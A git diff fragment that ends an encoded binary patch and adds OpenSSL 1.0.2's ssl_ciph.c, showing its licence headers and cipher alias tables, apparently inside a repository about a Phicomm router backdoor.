ziW73Go|?Ao9R)D=e6Uy!y3EeUx+!1yP4#}+3uyOa4jjlwX}0?wEIA5O5d-@+YG%lO
zkmiCpiT5#1?Aw|JT2?eCu`iZi<KH(-rQsjlI}hO8f5f!j6(D529kLF>9@BbGfPl3F
z!&>dJ#1il_D$5S*;Z3;25<)ejnBB8z;620e$azs{FtM-4J%_vliLb7})GoHoREgZx
zngzi_vUdAtkC8e(Ra!&3`(jBmsRj%Wj6ZevWB)5P&a`j6n+joR@S66o@0AKhcBeCf
zXoJ~0Sh7*(m{z<8#iVVvbRO;(<h_gz(ZCLJQ_$MW)&y)nX&CzD4F`2bWys7|*M7r#
zOJA9po3foWBkJui+zjuFTGQx+8UODc*`9t1osudN!KPa*3N*If+t!OVA2&HZM4Y+`
zO^sZ>&_$lOmPenUOHp><<~*Yioz!Qa=1)EQX@2}uPpk|Aw~(vg&~r@tmRGT3#CG#G
zX-g^wCyP#ntc)HLTLS1DzWT$F5pgpyFhqI7m#b@e51G93r??I@ihVq$TGoeyCHd&U
zLwO~rScV4vRozG4<JMZwqYFpJkx$QMs|@wOY<Gl6!QdM}!!O_~WPK=S+)iAWIxe*3
zd<ek*zG=PVf5E@UwBFJS2DBFp-bvCJK6+&nH`n}jYjmCIRulKw+E{X1KwQ*X)B&Ow
z;qE&d@BRt6MV7r_Fk~Ik893GbXSf5K-0Y$yWc}|$u+};tE-<pA`5A-h_C7PU2oDJ%
zx>3$Qu3KY$Qe7=`FC4gr*4B?P6!Q)tIO1W0SP1`*=*aQRoEkfuMdekvP(-E1|Guzi
zn4Frq|4{M3y_qx?Zd#TNhV}$`FX;4br6_^kK)Dwl=UX{7q@TnrrhS`!P!tJlL60=j
z9$1vAV3hM%I9$CK)VoCWBq7ka=_8B}^~^xb(p!sAjl5A6j}rzC6yY|Md2_HN9{}Cm
zdUsTh$6TiktF=<pyl<IUmi#F+#I!#A+oK_C$h7`ToSL7Y*X}Yu*=;5#<(dP3H=uE)
zx(V~r$XieDPIi`{qrAP9a#5dru%Ua-$gV5Dfay2&hzb9Hgpbhs6ESqZ^kU{RyD+gQ
zI!6R|E8P)p!|Ec(Xvq5WHmDG~#g>@gUdi4-vRnU1r818vC;;&*N{sAGzKJ{}{I-oM
z;7?#o%+Tbn<GS*|4l0z1hg>JWNxfM<CU^zo8m@;gOuM^&wEF?!4y+}37H}%2Gr4ST
zq#g4d>~^!uW<M77BheE>b{E#q_cK!;me`}PGi3kfUZ@gILF7!UA+t@y8Rn^J(g)(H
z*Eb+3e1J`e+)UC49X?F$P3$Qcd>ki%_<Q+tPCOXJo>(j=0|!P%C?t0wZ}<+XG1*p9
z=zk$(eW5!yYEd(jSe!Gpi1?+OAXej-PvHbH?Pp48i4_;YnTOW;H3?c$Ojb?Hzem&_
z!-ORlt8_tNWM_Iy=90F^mtsxR9V$3;@7i;M)_eLot7%i3+7W#@FtQ{4JF%@X?F}XQ
z@W^ow>JV07x#|XP2!uz+RV<A<s%MQ6RBLy9Z=M;yTs(f$GZMLWYe@TFufoHxgT&XA
zOv1kKSit&2!Qg$`F%ZGjgb`RUSb#o3n|<Z5y=!OD6<R6XNl}+GA%$Bo>$zwDS``0u
zVnN~+R4{b}`^fmwNI~LxTnPd4!o#MGx$6UM3kp{`3jbhKVOm{<K>91_ukzL|Wfs)z
zhlV51<wWyBb}Md5z7$HXp)Ky);vQ&3R(ISEF5?Q3KfDLc4%o3pA!`KM*!B%TNMPf8
zW{vexAigiZVDL$jeujp1;K<HGwO`VbIAUfNh4dZLsGV}QYsf`CaLaqS(OH@%Qfn{M
z=Qt*NWcB_%m<4GuRSS6F$gEml6s;Wn5Ilr?#u{vL#|NH)vt(qWi}Z||o-4=VI%H-0
zg0NH@Z?+zlmdjnKnC37JGEcUpHR%W7r1XPgUP3)%%}c<Uony8SH#Ax=VPAI`lWAcn
z`3n(4dmA0nUR=uuC)-Bf#@AY>mteKWlfyTn#et1~!HmbA!z7<xkJj*8l*M9j(N5C9
zEI!iL*BNe&^hV2CjfD$CzV_~3-^xgDNBb&YYfES6l9txxh7jrOh;&88X<wul62{cN
zuTSkW&Yf<|tFM`hqTyief^cu7rLA;YYqbA--?_#$Qct9}x4ZW;!<b!NeVMPcaY?Kz
z8uQI8yRfW$hX2x-xb&~RpuDX7qUjRDV1t$;+IAXrA254vqX8eJh|yX?iIxgVIp11f
z<n$Nje09<Z`FFyrrC_Iv9ISS9ob4^#kQ?+Ct@F(GmghEkivr%lDsO&Z=ZiwWsbuL^
zj?zW=TrbWHgKlGtDsSN(xu&-$=?Qv$>+)uKOXK5$-um3fyrluJFW@bL0Q8YP-&5sQ
z({X{<m%G%PPb>Yyil0Zv8gF4dH{#95Ddp`VhSWu0v&dE|CEKx&7}EFYYp%C&9oZ50
z)Ijq}(T)Jxv3;jefo$4KQ(8q%f}UjVTyN0^4@_K_7a*H!z2%<zJZ~vlkue&gK744f
zQ<^|WQBUqi6Lxy@YbH_!JB6J+N~WF!MH_PK$j%a6ZcurbsJwN#)nq5?zEPWLlq2s6
zB^Mz%VWWsk&|6+R!CO=<{8%-S3d<N#9QUg-S5p~LFB*_r=`Dn5<iC8HW{}7SGQU^&
z_6l5<sJvS#?`rbN9P){XV^GGiJhx$V9O2Iw={X(sy*5?8hsq-nqbCrQz9bLAHyadN
zN=(MEnT#Nt9#nZhp*-PR#3k+tp%Lw9bZ|RbqFha_RuPqT?NepNz6r%i-%-WZkza%l
zt1@j8ajx?|mg|Y+I0Ib@@r%^p$=ZpYu#Wr@&&yq;y)I+gtYj%}<kxjHhT<gKoQWyL
ze*HfoM}B)u$xR}CNW^w1W(p!1-AYoTd`fgY;9!-MLH!)*N6HU(<c4UBR(X9JsK2ip
z7x0$H#|OQYo>-2z9MMK^gs0?SMY&3Rf=UPNh{%_B<U%4zvDuJ^5=_S_W9p!ItXDej
z$izd8yV}gSo99jCd%k&GJgCh(RM}Tm+3!&OcTgLWc~#!h4b+Bp;{)D`_z5BJ?p)8~
zIo=8&G!G)IF{G<dJTQSy>K|y!*t&wGYc}b+C)Znnfp?s)^HKbIrK=C;vOkM{QZ4!k
z!VmSB@hH<hQIqnF4@bt5@X%&@jO5A8?xQn3I@k>V6~4=5dc<6heCl7s^|hYYPgOjj
zbcnfKoqNP8qb}6pYdGdGdsL`IuE(J5`tiwQjO`SUL3eqh(`<369L=&qiqlq|r}^Sy
zoKeOh&aY9t*ufVoKGVUQ6~D^CBZ^l!_>GE7eWNoy#`w_ySKavNvCA{b?_=>Fx$ysR
z;k36LOV1V;{-O(i-G#s7!jHJ{Japx;>^TK|GI|jGqDV>X32>}%kq^4?Hl^ofrAO=`
zpoe}k8>`-glK)i6i+u&;zw07@uaaM;))leWfc%p#^7Jd{SoP9xUt{stT==`-<ey`z
zUa@aMy?=9&Kjy+Gp!`_%p6tTUcHtMg@SqEy<H8$Vcsn??ccq#-#9j;Sjk?GWD*0Q~
zlu{2_O7yz}>DjILB@!DCC_Y|IHF7-TUO@5Xii>>|%DkfZQ;LiI6Ziqe4=R4E(w~Pl
zcq~7k1Wxw!&{G+t9(gd%QGBoBdcSn3;)fL%dl8hWRs1?N@rnHs`1Oi^qPX4*^(mf5
z6F!pI58-Hmk7ehbF8qfs{1F$v(}ln7!asN6r(!`F%gz}tyv~I$cHzC?6qnnT!?d4o
zRs2K6%Z2w0<A;i$?Ug|DClsHrxN^7gvf@pOn@Z1nivL`3-NvJeKk49JEP-U_^NNf8
z9CS?s*JYJzahT!4D_nS`3$JzIi(PoD3t#TSqb__9oZ8#08YlLiXxW1<@*9=>Jts>q
zh<zqb-*AyX;KKjz!Y5z}AIr~YxbPX^WdHeUK#RRA?5R{d?-XgL*oWe@(M3<23-5Q~
z8(jDUF8r4+{5co?f(!q%3#Tn0`C->-vb|!jOsDLDN`F_&ib%M1MUQ|jZEfO7OE}sc
zUJ`2;tpDQjnc==@cQ3@E{o#(b{xbi?7tNe$l!dCx>B~=F7t+@S^mP$^T})q>(AT9#
zcy?%BRUj0eH*40ynuc&gpej@oHWrcErIBd3FSg{yNNY4qhDbU$FsCNm7K2I4!(EY^
z!d<b>PCD<2^(|u(?Y$9RfZEV;L0gy<8&!?7!gFfogqQYq-xO}`jI?waH47F%Lo_U&
z^%!9^2@j6Kt;?2&+gmz1>B*8XC(<8oYl*f9HQ|K~^A^;Es~Z+kvyJKn*VZ@83wL(o
zfs-&ln@tTtNwT)1t1Z%>adEg0Ic<^lmRM&ryrRvhxu!ncx2(mV6+juSc?BM4b+=}-
z$nahfkUm+VXfmm&zq;nyu(%?>boa<}WuWBhp_y>xf`x%_tOt+2+Kr&u)6(0rqEGOu
zx#FP8QS`HoYhBjT(WOhZ#?S*+po!7GaBFwZDuXnNdV;1ra*5Ffh%4r=(YYO6ee#(d
zJ>es7l_MsoIqL;5zmvgKB`4gI6-I^<c4YKLI;oen#(I0{DWR}OcY9rRCRYy-5j~OH
zx<u5`7wLlo$WjU$iDgNqT@>=3NJK_199`8D5t8zmr7W$Qi2fa0L0x-gOJ_`V=4_|x
z=;~00W*O;j?`&DBI>hJ<)pwnplgg+r=*&XDEf0$hA#<*&Sx`Ic+HiefL0}Fw-tR0x
zx^zR9$V`0+uQ;W}$iqOU!G!@Gt`3AdI}mTWCQYs4k?kl<gY6$=(LfuclnWN~nXW_B
zO6rfNo!u>%__ScSy`vK$6O)foRXZ=-CkdTW*y-3B?d>$`F~iW~<nWS?ZaMFuP&+07
zDlEDKiHZ}NedKVK^ACA|?4YV-mr(OyAI-gDZXzYZ6Du&hV_o9mw<y!rp}N-bMVt@1
zrTJYwy&YZAc1(JxysMiAc}ujTTh57Og|JD?d!rteN2n#}<HBLo>9ZqqNvxw&trZfo
z0Zu+*m%6l^fg_RS;m(#mJr6TE3Jv0z8S7~MvW|8=RF_3CTld6zd%F8XY%uBZN>pJr
zy9=$XU#bT7Md62~qDk2yFQy$@-ZIbRu?;k6$^4vtd_XFpH4}+=5k8t<Oc06qm+{eD
zJ|B_%D~#)B_9XvR#vjEwCE{n`qxEbjh(!EMd^F!j5Q+F%_-KAE?msCx_0%x#L%x>3
zPI25$iKj@K_cKmgaLvEX^qj+ZoXO)>A|rnn<Fs|wdVb9G6f=GwljnLKWt`jdEYrj7
z(fd8}!&Ih!ACu?&kPAPF9D_s$UhibZN&mU{=yuWlIVERYZeY9w`C48-lPCG<jQ^C$
ze~s}?iWB4VTbVpPd(ry;oAL7*pGeL{qHNx-GZc5W>vG0<f1~?VN+e%~kFNJo#=p+^
z?-?&={4nEO|722(L<cTkuDH|w8<@NwWwbqaxbUAaegTtzjd32|V%(olqU;iUwEjlL
zo%USE<hh<FT;w;o$e)S*Jte39V#UcGuK!*a`JXd+?w>bZ<mtYG66xpi-V+2C{6d^+
zKTLJumoiSjU26Fn#%V6qd_Lp!>`3z_7an1}l*#{_;!eNa&*XW##Q$}nJhhkGxr@nj
zJ9jhA>wTMXKJNbJ!aeFa8P&_>r?~K`F8mV4=~<cf+iVxUh;d$T8{^#nJudtgj89|r
z?qZye>qCk==dq8OJfFu()pI`b4<DyjGL9ebGwn4Mcj|9o@?3wCalVe<&p2Pl#sAl#
zKC*{?!_|I%OUXO?+dE7T?{BjwpfD2Yxe6bxXS{lj=+rY&agslm$)C?S_jAHU&+SZ}
z+jEcNPQU$($)CsSeS-1njPGHbkE3@O=i{hp5(*<xyJq2|{m{kuY{qY9++_UU8Rvd@
zhVfb^|19HYGyYq~>llAcaf%E5W~c3ZhjDsNrTGD-=W513V?4z8cv_5+$PaVy(R#kZ
z_*}-T8K1{^6XW%a#~Al9emCR1|No3}9+zJ+&f~I)alTL9r8xB~zVCg7$)CsUd6RKI
z?oOgjB$89lWW~vET+fv*@>MSKM;X5sy0rgAuyIZLuVXx)Isp>##rSCXGRAp7oX<Gj
z3uyT+#+w))V4TP0KE}EJM;Pb#FXDedpqK3Aae0Z!-@xj9jd32Y_Za7K`Ot+QQ`{M^
zaWqJfobj5>co_NGKW8!C%=iq(`TTP!<1I`+#JG>~A28m^_&tpCxIe%+kNXhgJTChf
z=W+jxaUS;*Plgdl<R2c#QyJ%RoX$9p<Hd~gI94&v<5<f$_uKW1H^U|!mm3-9{*N)v
z{dqg%KBnhk#hvTjUzz+lO#WlWBaF|Vj0+^vLn7MFYZWJdwllth@g<C}VSFj$KW3cA
z_YuXZUOLtFKEXKs6ruShre_)Bdl={X_c7kV<UeKlY0A|4N0>bK+iB|e5b}eM$v?q3
zf6nka<J_LJrl2qq>EY||6^wKFTE^$0jJ9(w<GjBuW}L4(J&f~p=XS>Hnf@QT@c(3-
z>)*^c*ME?4AJc#BDY!r)Kk)WO8Sg}%Ztn)hdA&bjoY(sx<13h+Uoqar_#Vc&Ki_4X
z>p93c*HdsRlp;~PxSjyxJnk)wb3d$RobS8hjPw5RbH;hSk1*a1o3uYSGS1_^OL1Cv
z_`LKIljr+{-!tCB^uNhC*OO+P$MF*vo~wR;BY*PvPG<aHSiNU6-plxO#<@MS8Rz$X
zOBm;IxsmZcroWf*DC4UXr}>SBg7*J<CeP=wI~nJ3`6c5%rso*r-2PHp<dCRdKEKUS
zoc!s>N82-ib4tWd$4B#3`9vi@A4km(P83+kbMBK^)Jt{iM0<5g#OSk<E|8kVca|sA
z_1zAx-?Mtm!S#DnFFLq>KWe{&>-V6h<j4$dkA6?7-of?zJW&VN@9o^_;QGCtjSjBg
z+d1Ii`n{b=%30bT{oYQggX{NpbUU=Xem`f8Ltek1L;v|tNz3c^a~^hZ{eI4V2iNcC
zeD2`-{hSK*98&Ao@1?XkxPC8XgM;h$Ql4;d{a(s02iNbV{K>)fdntz;T)&r+M;)B`
zLBE$`I=Fs+V}pb1_cV4nxPD(^3VS|DzR>SWG&{I{ufQnlTeTwEvINIyuRJc(XT6cm
zma-^*H#W-XXLX}&Nnf8)*4s@NB<?T6>jSObD^}2tvSnS}(MTEom12hc0Zd*m?TVH4
z^mg~)hniI=N(v*(@T(fVFYy18e9%H&db~qhrMkXc%{Mw*b$@*+?rF)Dl^G&W_Ls|J
zzFHS(x}maaIuiF{Br#2K6>dTztzq+=W^`0x%OIM&NT;*>Ee^YN0jK>mhZ4I$3#g+m
z-{Ii8ygpVUpUzctGt$GVep+jJ(&hBA7Mc2-%T1x1-Z7F>mhRP0z()=1Oo<{@-j^Zr
zMEhT3T6;;SvwVdrzh3owE$=MfiHx!0e~2~*NaZRp6#o<P(dBh`#;TjjrD!vbRH)Xe
sNjRsj<Sb7*ov{Zpc2B2o-1C!jSaSOBWaN!i-d86Jt!8EE)LH(20hqHGYXATM

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_ciph.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_ciph.c
new file mode 100644
index 0000000..b038c55
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_ciph.c
@@ -0,0 +1,2067 @@
+/* ssl/ssl_ciph.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECC cipher suite support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#include <stdio.h>
+#include <openssl/objects.h>
+#ifndef OPENSSL_NO_COMP
+# include <openssl/comp.h>
+#endif
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include "ssl_locl.h"
+
+#define SSL_ENC_DES_IDX         0
+#define SSL_ENC_3DES_IDX        1
+#define SSL_ENC_RC4_IDX         2
+#define SSL_ENC_RC2_IDX         3
+#define SSL_ENC_IDEA_IDX        4
+#define SSL_ENC_NULL_IDX        5
+#define SSL_ENC_AES128_IDX      6
+#define SSL_ENC_AES256_IDX      7
+#define SSL_ENC_CAMELLIA128_IDX 8
+#define SSL_ENC_CAMELLIA256_IDX 9
+#define SSL_ENC_GOST89_IDX      10
+#define SSL_ENC_SEED_IDX        11
+#define SSL_ENC_AES128GCM_IDX   12
+#define SSL_ENC_AES256GCM_IDX   13
+#define SSL_ENC_NUM_IDX         14
+
+static const EVP_CIPHER *ssl_cipher_methods[SSL_ENC_NUM_IDX] = {
+    NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
+    NULL, NULL
+};
+
+#define SSL_COMP_NULL_IDX       0
+#define SSL_COMP_ZLIB_IDX       1
+#define SSL_COMP_NUM_IDX        2
+
+static STACK_OF(SSL_COMP) *ssl_comp_methods = NULL;
+
+#define SSL_MD_MD5_IDX  0
+#define SSL_MD_SHA1_IDX 1
+#define SSL_MD_GOST94_IDX 2
+#define SSL_MD_GOST89MAC_IDX 3
+#define SSL_MD_SHA256_IDX 4
+#define SSL_MD_SHA384_IDX 5
+/*
+ * Constant SSL_MAX_DIGEST equal to size of digests array should be defined
+ * in the ssl_locl.h
+ */
+#define SSL_MD_NUM_IDX  SSL_MAX_DIGEST
+static const EVP_MD *ssl_digest_methods[SSL_MD_NUM_IDX] = {
+    NULL, NULL, NULL, NULL, NULL, NULL
+};
+
+/*
+ * PKEY_TYPE for GOST89MAC is known in advance, but, because implementation
+ * is engine-provided, we'll fill it only if corresponding EVP_PKEY_METHOD is
+ * found
+ */
+static int ssl_mac_pkey_id[SSL_MD_NUM_IDX] = {
+    EVP_PKEY_HMAC, EVP_PKEY_HMAC, EVP_PKEY_HMAC, NID_undef,
+    EVP_PKEY_HMAC, EVP_PKEY_HMAC
+};
+
+static int ssl_mac_secret_size[SSL_MD_NUM_IDX] = {
+    0, 0, 0, 0, 0, 0
+};
+
+static int ssl_handshake_digest_flag[SSL_MD_NUM_IDX] = {
+    SSL_HANDSHAKE_MAC_MD5, SSL_HANDSHAKE_MAC_SHA,
+    SSL_HANDSHAKE_MAC_GOST94, 0, SSL_HANDSHAKE_MAC_SHA256,
+    SSL_HANDSHAKE_MAC_SHA384
+};
+
+#define CIPHER_ADD      1
+#define CIPHER_KILL     2
+#define CIPHER_DEL      3
+#define CIPHER_ORD      4
+#define CIPHER_SPECIAL  5
+
+typedef struct cipher_order_st {
+    const SSL_CIPHER *cipher;
+    int active;
+    int dead;
+    struct cipher_order_st *next, *prev;
+} CIPHER_ORDER;
+
+static const SSL_CIPHER cipher_aliases[] = {
+    /* "ALL" doesn't include eNULL (must be specifically enabled) */
+    {0, SSL_TXT_ALL, 0, 0, 0, ~SSL_eNULL, 0, 0, 0, 0, 0, 0},
+    /* "COMPLEMENTOFALL" */
+    {0, SSL_TXT_CMPALL, 0, 0, 0, SSL_eNULL, 0, 0, 0, 0, 0, 0},
+
+    /*
+     * "COMPLEMENTOFDEFAULT" (does *not* include ciphersuites not found in
+     * ALL!)
+     */
+    {0, SSL_TXT_CMPDEF, 0, SSL_kEDH | SSL_kEECDH, SSL_aNULL, ~SSL_eNULL, 0, 0,
+     0, 0, 0, 0},
+
+    /*
+     * key exchange aliases (some of those using only a single bit here
+     * combine multiple key exchange algs according to the RFCs, e.g. kEDH
+     * combines DHE_DSS and DHE_RSA)
+     */
+    {0, SSL_TXT_kRSA, 0, SSL_kRSA, 0, 0, 0, 0, 0, 0, 0, 0},
+
+    {0, SSL_TXT_kDHr, 0, SSL_kDHr, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_kDHd, 0, SSL_kDHd, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_kDH, 0, SSL_kDHr | SSL_kDHd, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_kEDH, 0, SSL_kEDH, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_kDHE, 0, SSL_kEDH, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_DH, 0, SSL_kDHr | SSL_kDHd | SSL_kEDH, 0, 0, 0, 0, 0, 0, 0,
+     0},
+
+    {0, SSL_TXT_kKRB5, 0, SSL_kKRB5, 0, 0, 0, 0, 0, 0, 0, 0},
+
+    {0, SSL_TXT_kECDHr, 0, SSL_kECDHr, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_kECDHe, 0, SSL_kECDHe, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_kECDH, 0, SSL_kECDHr | SSL_kECDHe, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_kEECDH, 0, SSL_kEECDH, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_kECDHE, 0, SSL_kEECDH, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_ECDH, 0, SSL_kECDHr | SSL_kECDHe | SSL_kEECDH, 0, 0, 0, 0, 0,
+     0, 0, 0},
+
+    {0, SSL_TXT_kPSK, 0, SSL_kPSK, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_kSRP, 0, SSL_kSRP, 0, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_kGOST, 0, SSL_kGOST, 0, 0, 0, 0, 0, 0, 0, 0},
+
+    /* server authentication aliases */
+    {0, SSL_TXT_aRSA, 0, 0, SSL_aRSA, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_aDSS, 0, 0, SSL_aDSS, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_DSS, 0, 0, SSL_aDSS, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_aKRB5, 0, 0, SSL_aKRB5, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_aNULL, 0, 0, SSL_aNULL, 0, 0, 0, 0, 0, 0, 0},
+    /* no such ciphersuites supported! */
+    {0, SSL_TXT_aDH, 0, 0, SSL_aDH, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_aECDH, 0, 0, SSL_aECDH, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_aECDSA, 0, 0, SSL_aECDSA, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_ECDSA, 0, 0, SSL_aECDSA, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_aPSK, 0, 0, SSL_aPSK, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_aGOST94, 0, 0, SSL_aGOST94, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_aGOST01, 0, 0, SSL_aGOST01, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_aGOST, 0, 0, SSL_aGOST94 | SSL_aGOST01, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_aSRP, 0, 0, SSL_aSRP, 0, 0, 0, 0, 0, 0, 0},
+
+    /* aliases combining key exchange and server authentication */
+    {0, SSL_TXT_EDH, 0, SSL_kEDH, ~SSL_aNULL, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_DHE, 0, SSL_kEDH, ~SSL_aNULL, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_EECDH, 0, SSL_kEECDH, ~SSL_aNULL, 0, 0, 0, 0, 0, 0, 0},
+    {0, SSL_TXT_ECDHE, 0, SSL_kEECDH, ~SSL_aNULL, 0, 0, 0, 0, 0, 0, 0},
